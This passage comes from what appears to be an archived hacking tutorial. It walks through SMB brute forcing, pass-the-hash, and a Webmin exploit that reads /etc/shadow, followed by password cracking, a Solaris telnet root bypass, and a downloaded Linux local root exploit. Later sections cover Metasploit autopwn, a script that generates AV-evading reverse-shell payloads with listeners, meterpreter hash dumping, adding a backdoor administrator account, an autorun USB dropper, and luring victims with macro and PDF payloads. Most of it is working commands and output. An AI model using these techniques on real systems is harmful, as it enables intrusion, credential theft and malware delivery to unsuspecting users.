set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.100:
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-brute:
|_ Administrator:F703F386322B0662E72C57EF50F76A05 => Login was successful
Interesting ports on 192.168.80.135:
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-brute:
| epp:E52CAC67419A9A224A3B108F3FA6CB6D => Login was successful
|_ Jim:209CA2D6E74286E9AAD3B435B51404EE => Login was successful
6 of 17 12/24/10 5:51 PM
7. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
[End Result]------------------------------------------------------------------------------------
Now we can compromise other system from network that use the same password (Hashing with no-crack), Use Passing the
to impersonating user without password. I use samba-3.0.22 with patched:
./configure --with-smbmount
patch -p0 <samba-3.0.22-add-user.patch
patch -p0 <samba-3.0.22-passhash.patch
[SMB Hash]--------------------------------------------------------------------------------------
bt cwh # export SMBHASH="F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B"
bt cwh # ./smbmount //192.168.80.129/c$ /mnt/passhash -o username=administrator
Password: << Insert hash from SMBHASH (F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B)
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...
bt cwh # ls /mnt/passhash/
dir.txt Documents and Settings Inetpub Program Files WINNT
bt cwh #
[End Result]------------------------------------------------------------------------------------
Other tool is pass-the-hash Toolkit (http://oss.coresecurity.com/projects/pshtoolkit.html) to impersonating user wit
mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its
and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).
We need to compromise one machine for attack other machine that use the same credentials, Now we got their command s
[Victim Result]---------------------------------------------------------------------------------
C:pshtoolkit_v1.4whosthere>whosthere
WHOSTHERE v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies
This tool lists the active LSA logon sessions with NTLM credentials.
(use -h for help).
-B is now used by default. Trying to find correct addresses..Found!.
the output format is: username:domain:lmhash:nthash
cwh:SERVER:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
C:pshtoolkit_v1.4whosthere>cd ..iam
C:pshtoolkit_v1.4iam>iam.exe -r cmd.exe -h Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B304
IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies
Parameters:
Username: Administrator
Domainname: SERVER2
LM hash: 209CA2D6E74286E9AAD3B435B51404EE
NT hash: BA69764BCCF8F41121E0B3046CE46C67
Run: cmd.exe
LSASRV.DLL version: 00050001h. A280DC0h
Checking LSASRV.DLL....skipped. (-B was specified).
Trying to obtain addresses...Ok! (AC = 75753BA0, EM = 7573FDEC)
The current logon credentials were successful changed!
[End Result]------------------------------------------------------------------------------------
Now we have Administrator credential in the new MS-dos that Maybe can compromise many machine in network !!
#######################################
[0x02] - The Art of Unix/Linux Attack
#######################################
++++++++++++++++++++++++++++++++++
[0x02a] - Scanning & Enumeration
++++++++++++++++++++++++++++++++++
The first thing important before start hacking is gathering as much information as you can.
You can use the information to guess password, specific points to attack or anything as
you can imagine. Our favourite tool used to scan a target is nmap. We know openning ports and
a software version with only one command. We show you below :D
[Nmap Result]-----------------------------------------------------------------------------------
bt cwh # nmap -sV www.target.com
Starting Nmap 4.76 ( http://nmap.org ) at 2009-07-03 16:38 SE Asia Standard Time
Interesting ports on 192.168.0.111:
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.6
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
25/tcp open smtp Cisco PIX sanitized smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
111/tcp filtered rpcbind
7 of 17 12/24/10 5:51 PM
8. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
554/tcp filtered rtsp
1720/tcp filtered H.323/Q.931
2000/tcp filtered callbook
3306/tcp open mysql MySQL (unauthorized)
5060/tcp filtered sip
10000/tcp open http Webmin httpd
Service Info: OSs: Unix, Linux; Device: firewall
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
[End Result]------------------------------------------------------------------------------------
In the result, you see that this system use Webmin but we do not know the exact version.
If we are not an Alzheimer, Webmin used to expose file disclosure vulnerability in version 1.290.
We try to search in milw0rm.com and , bingo!!, We find one at http://milw0rm.com/exploits/2017 .
It is perl script exploit. So, we download the script and save as 2017.pl then we launch the command ...
[Perl Script Result]----------------------------------------------------------------------------
bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:
[End Perl Script Result]------------------------------------------------------------------------
lol !!! It seems that an admin is an outdated. She do not update or patch her Webmin.
++++++++++++++++++++++++++
[0x02b] - Gaining Access
++++++++++++++++++++++++++
As the target is linux server, it is harder than windows server to remotely attack.
The most remote exploits affected on linux are from third party software such as
ftp, ssh, web server. The ways to access linux server are to exploit third party
running services, to get user information from web application vulnerability then
do the brute forcing and to do social engineer toward valid user.
In our example case, we highly recommend you to try following command:
bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow
This command tries to read /etc/shadow file. If a result seem like below, you are lucky ;D
[Perl Script Result]----------------------------------------------------------------------------
root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
8 of 17 12/24/10 5:51 PM
9. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::
[End Perl Script Result]------------------------------------------------------------------------
We put the result in file shadow.txt and then try to crack passwords by using John the Ripper.
(dict.lst is dictionary file)
[John Result]-----------------------------------------------------------------------------------
bt cwh # john --wordlist=dict.lst shadow.txt
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
user1 (user1)
guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc
[End John Result]-------------------------------------------------------------------------------
It means that password of user1 is "user1" and cannot find password for root.
Now, you can login to the target system by using credential information of user1.
After you can find the way into the system, you have to figure the way to escalate
your privilege.
We have another example to show you. It is telnet vulnerability on solaris 10/11.
This vulnerability allows you to login easily with root privilege. We just send
[telnet –l "-froot" 192.168.0.112] to telnet deamon on solaris 10/11.
[Telnet bypass]---------------------------------------------------------------------------------
bt cwh # telnet –l "-froot" 192.168.0.112
Trying 192.168.0.112...
Connected to 192.168.0.112.
Escape character is '^]'.
Last login: Sun Jun 30 02:02:02 from 192.168.0.2
Sun Microsystems Inc. SunOS 5.10 Generic January 2007
# id
uid=0(root) gid=0(root)
#
[End Result]------------------------------------------------------------------------------------
If we use this technique, we do not want to escalate privilege cause we already login
as root privilege.
++++++++++++++++++++++++++++++++
[0x02c] - Escalating Privilege
++++++++++++++++++++++++++++++++
In this article, we introduce you to use local root exploit for linux. You can find
the exploits from milw0rm.com. the first tasks after access the system are to check
linux kernel version and the user id.
user1@linuxserver:~$ uname -a
Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
user1@linuxserver:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
As the result of two commands above, we want to escalate our privilege to be root and
we remember that there is an local root exploit for linux 2.6.17 - 2.6.24 on milw0rm.com ;D
we do not hesitate to download the code, compile it and run. The result is shown below ...
user1@linuxserver:~$ wget http://milw0rm.com/exploits/5092
--17:17:21-- http://milw0rm.com/exploits/5092
=> `5092'
Resolving milw0rm.com... 76.74.9.18
Connecting to milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 7,197 11.58K/s
17:17:23 (11.58 KB/s) - `5092' saved [7197]
user1@linuxserver:~$ gcc -o 5092 5092.c
5092.c:289:28: warning: no newline at end of file
user1@linuxserver:~$ ./5092
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
9 of 17 12/24/10 5:51 PM
10. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e79000 .. 0xb7eab000
[+] root
root@linuxserver:~# id
uid=0(root) gid=0(root) groups=1001(root)
Finally, we are a root of target server. We can do whatever we want. XD
#####################################
[0x03] - Metasploit Ninja-Autopwned
#####################################
Metasploit is a tool for exploiting system vulnerabilities but penetration tester need to find those vulnerabilities
this is a drawback of metasploit. However, the lastest version of metasploit is added a feature called "Autopwned" which aut
exploit vulnerabilities reported from nmap or nessus.
Note: Metasploit have one features called "Autopwn Metasploit Automated". That can scanning all network by nmap and
+++++++++++++++++++++++++++++++++++++
[0x03a] - Nmap+Metasploit Autopwned
+++++++++++++++++++++++++++++++++++++
[Nmap Result]-----------------------------------------------------------------------------------
bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 12:04 GMT
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds
[End Result]------------------------------------------------------------------------------------
Now we got nmap.xml for import to Metasploit framework...
[Import Nmap result to Metasploit]--------------------------------------------------------------
bt framework3 # msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ / _ __/ _` / __| '_ | |/ _ | | __|
| | | | | | __/ || (_| __ |_) | | (_) | | |_
|_| |_| |_|___|____,_|___/ .__/|_|___/|_|__|
| |
|_|
=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/test.db
msf > db_import_nmap_xml /root/nmap.xml
msf > db_hosts
[*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -p -e
[*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80...
[*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80...
[*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80...
[*] Started bind handler
[*] Started bind handler
[*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80...
[*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Started bind handler
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
10 of 17 12/24/10 5:51 PM
11. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:52929 -> 192.168.80.129:10529)
.......
.......
sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:52929 -> 192.168.80.129:10529
2 Command shell 192.168.80.131:50775 -> 192.168.80.129:17887
3 Command shell 192.168.80.131:40985 -> 192.168.80.129:37295
4 Command shell 192.168.80.131:51652 -> 192.168.80.129:37095
5 Command shell 192.168.80.131:38373 -> 192.168.80.129:17130
6 Command shell 192.168.80.131:56722 -> 192.168.80.129:20693
msf >sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:WINNTsystem32>
[End Result]------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++
[0x03b] - Nessus+Metasploit Autopwned
+++++++++++++++++++++++++++++++++++++++
First, you must use Nessus scanner for VA and export file with *.nbe, then import to metasploit framework for autopw
[Import Nessus(nbe) result to Metasploit]-------------------------------------------------------
bt framework3 # msfconsole
# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #
=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/ness.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/ness.db
msf > db_import_nessus_nbe /root/demo.nbe
msf > db_hosts
[*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -x -t
[*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
msf > db_autopwn -x -e
[*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
11 of 17 12/24/10 5:51 PM
12. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
[*] Started bind handler
[*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Started bind handler
[*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Sending exploit ...
msf >
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[BROWSER] ...
[*] Started bind handler
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[browser] ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:41655 -> 192.168.80.129:39354)
[*] Command shell session 2 opened (192.168.80.131:57118 -> 192.168.80.129:7605)
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[lsarpc]...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[BROWSER] ...
[*] Building the stub data...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[browser] ...
[*] Calling the vulnerable function...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 3 opened (192.168.80.131:50407 -> 192.168.80.129:15299)
[*] Command shell session 4 opened (192.168.80.131:32768 -> 192.168.80.129:30092)
[*] The DCERPC service did not reply to our request
[*] Command shell session 5 opened (192.168.80.131:39556 -> 192.168.80.129:17330)
sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:41655 -> 192.168.80.129:39354
2 Command shell 192.168.80.131:57118 -> 192.168.80.129:7605
3 Command shell 192.168.80.131:50407 -> 192.168.80.129:15299
4 Command shell 192.168.80.131:32768 -> 192.168.80.129:30092
5 Command shell 192.168.80.131:39556 -> 192.168.80.129:17330
msf > sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:WINNTsystem32>
[End Result]------------------------------------------------------------------------------------
#############################################
[0x04] - Client-Side Attack with Metasploit
#############################################
++++++++++++++++++++++++++++++++++++++++
[0x04a] - Metasploit Payload Generator
++++++++++++++++++++++++++++++++++++++++
Metasploit Payload Generator is a tool allowing you to create malicious code easily.
This is not a tool to exploit a system. You can use the tool to create malicious payload and
save it to exe file then you need to lure a victim to execute that file on his/her machine.
There is a feature to encode your payload to get past most AV and IDS/IPS (13 Encoding Choices).
So we can use Metasploit Payload Generator from "Fast-Track". If you don't have "fast-track", you need
Metasploit framework and this script for you ;)
[metascript]------------------------------------------------------------------------------------
#!/bin/bash
12 of 17 12/24/10 5:51 PM
13. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
echo "###########################################"
echo "#### 0-Days Exploits with MetaCompiler ####"
echo "###########################################"
echo ""
echo -n "Enter your Listener IP Address: "
read ip
echo -n "Enter your Listener Port: "
read port
echo ""
echo "-= MetaCompiler Payloads =-"
echo ""
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "+ Meterpreter Reverse Connectback - windows/meterpreter/reverse_tcp +"
echo "+ VNC Inject Reverse Connectback - windows/vncinject/reverse_tcp +"
echo "+ Generic Reverse Shell - generic/shell_reverse_tcp +"
echo "+ Linux X86 Reverse Shell - linux/x86/shell_reverse_tcp +"
echo "+ Mac OSX (iphone) Reverse Shell - osx/ppc/shell/reverse_tcp +"
echo "+ Windows Reverse Shell - windows/shell/reverse_tcp +"
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo ""
echo -n "Enter your Payload Exploit: "
read payload
echo -n "Enter your Output file name (xpl.exe): "
read file
echo ""
echo "-= Processing =-"
/pentest/exploits/framework3/msfpayload $payload LHOST=$ip LPORT=$port R | /pentest/exploits/framework3/msfencode -b '' -t e
echo "Enjoy 0-Days Exploit with $file ;)"
echo ""
echo ""
echo "-= Now Waiting for Reverse Connection from Victim =-"
/pentest/exploits/framework3/msfcli multi/handler PAYLOAD=$payload LHOST=$ip LPORT=$port DisableCourtesyShell=True E
[End script]------------------------------------------------------------------------------------
Next, Example for using "Fast-Track".
[Metasploit Gen]--------------------------------------------------------------------------------
bt fast-track # ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************
*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***
Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.
Your system has all requirements needed to run Fast-Track!
Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. External Hacking
3. Internal Hacking
4. Exploits
5. SQLPwnage
6. Payload Generator
7. Tutorials
8. Changelog
9. Credits
10. About
11. Exit
Enter the number: 6
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
#####################################
### ###
### Metasploit Payload Generator ###
### ###
### Written by: Dave Kennedy ###
### aka ReL1K ###
### ###
#####################################
#####################################
13 of 17 12/24/10 5:51 PM
14. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.
This will also encode your payload to get past most AV and
IDS/IPS.
What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to attacker.
6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on victim through Reflective to attacker.
Enter choice (example 1-6): 2
Below is a list of encodings to try and bypass AV.
Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
Enter your choice : 2
Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131
Enter the port of the Listener: 5555
Do you want to create an EXE or Shellcode
1. Executable
2. Shellcode
Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai
A payload has been created in this directory and is named 'payload.exe'. Enjoy!
Do you want to start a listener to receive the payload yes or no: yes
Launching Listener...
***********************************************************************************************
Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.80.131 on Local Port: 5555 Using encoding: ENCODING=shikata_ga_nai
***********************************************************************************************
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948)
meterpreter > getuid
Server username: LENOVO-X200prathan
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
14 of 17 12/24/10 5:51 PM
15. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsprathanDesktop>hostname
LENOVO-X200
C:Documents and SettingsprathanDesktop>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.
C:Documents and SettingsprathanDesktop>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.
C:Documents and SettingsprathanDesktop>net user
net user
User accounts for
-------------------------------------------------------------------------------
Administrator cwh Guest
prathan TsInternetUser
The command completed with one or more errors.
[End Result]------------------------------------------------------------------------------------
From Above, We can Attack victim from Social-engineering if they execute "payload.exe". What's happen If we use Auto
[USB Pwnage]------------------------------------------------------------------------------------
+autorun.inf
[autorun]
action=Open Files On Folder
icon=iconsdrive.ico
shellexecute=nircmd.exe execmd CALL batexeprogstart.bat
+icons
+nircmd.exe
+batexe
-progstart.bat
@echo off
nircmd.exe execmd CALL batexemoddump.bat
nircmd.exe execmd CALL batexemodsmax.bat
-moddump.bat
@echo off
nircmd.exe execmd .batexepayload.exe
-modsmax.bat
@echo off
start ..
nircmd.exe win max ititle "Remo"
[End File]-------------------------------------------------------------------------------------
If someone open USB drive with Autorun or Double-click USB drive from My computer, Their System will compromised !!
++++++++++++++++++++++++++++++++++
[0x04b] - MS-Office Macro Ownage
++++++++++++++++++++++++++++++++++
MS word, Excel, Powerpoint, etc. can import VBscript to their files. Metasploit can generate VBScript that contains
In this example, we will show script for exploiting victim with MS-Excel. The victim machine will start reverse VNC to our m
the victim opens MS-Excel file.
[Msf script]------------------------------------------------------------------------------------
bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas
bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2658 bytes)
[*] Sleeping before handling stage...
[End Result]------------------------------------------------------------------------------------
Now we have "script.bas", Open MSExcel -> Tools -> Macro -> Visual Basic Editor then import "script.bas" and SAVE Ex
After that use your skill for social engineering, Force them to open MSExcel and Enable Macros. We will control target via V
++++++++++++++++++++++++++++++++++
[0x04c] - AdobeReader PDF Ownage
15 of 17 12/24/10 5:51 PM
16. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12902/
++++++++++++++++++++++++++++++++++
Metasploit has exploit script for Generating Malicious PDF file to Attack through "Adobe JBIG2Decode Memory Corrupti
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
When we generate malicious PDF, send to victim and social-engineering for open PDF file. Game Over !!
[AdobeReader Exploit]---------------------------------------------------------------------------
bt framework3 # msfconsole
_ _ _ _
